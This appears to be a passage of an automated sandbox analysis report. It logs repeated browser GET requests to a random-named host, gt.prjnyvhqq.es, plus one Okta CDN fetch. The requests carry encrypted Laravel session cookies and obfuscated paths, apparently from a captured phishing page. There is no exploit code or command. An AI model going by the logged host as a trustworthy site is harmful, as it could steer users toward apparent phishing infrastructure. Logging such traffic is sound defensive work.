                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /klsu6d3zoH5wmy0peV2uToNijTGSfrLunny4LgpAlT3rGpdJZIfwx214 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijskoldCggu31f20b0CIcq30AhAYsKJqrz8ih0T8qdNzvqPbAxgvsbYab230 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxnYfqODAqON352foJK6CCE9kK3PljnLopsxN1ximawy4Kzj8eL12129 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrRFwXbevZEvnVMAiUx7UvsVvR0ghZ3dwRujkZwN45137 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klsu6d3zoH5wmy0peV2uToNijTGSfrLunny4LgpAlT3rGpdJZIfwx214 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxnYfqODAqON352foJK6CCE9kK3PljnLopsxN1ximawy4Kzj8eL12129 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijskoldCggu31f20b0CIcq30AhAYsKJqrz8ih0T8qdNzvqPbAxgvsbYab230 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /mnKYewUy2Erp7R0vU2rSXaMo7Cq7klTDYuB2MBcvhu2iC2jn90145 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klnbyrX5mgR6oOR29lBToSlNE2NGVwxkoZOideivFRicbZu8Yg56170 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /yzQ7WQ1WS103WLJUON9XEhz9rsLHCpu997FrOW4sdEIKab180 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opaoRhBjUgHiIoaCKfIezzzWoVkJqtK30HJghd3t16wd98Kwq3Lsex6f6R62cd197 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /vsa63gyXm8VR7xw3vpJZf7iHjG0DeGF4HB3ynikxXywlJfvOycsuvRsyF9WKYQq1gc5Fcm HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijjoQp1oxSOnXEcvEdrNB8yaA6DF8mn5FECCpjHp1oZF4pjgrN12205 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
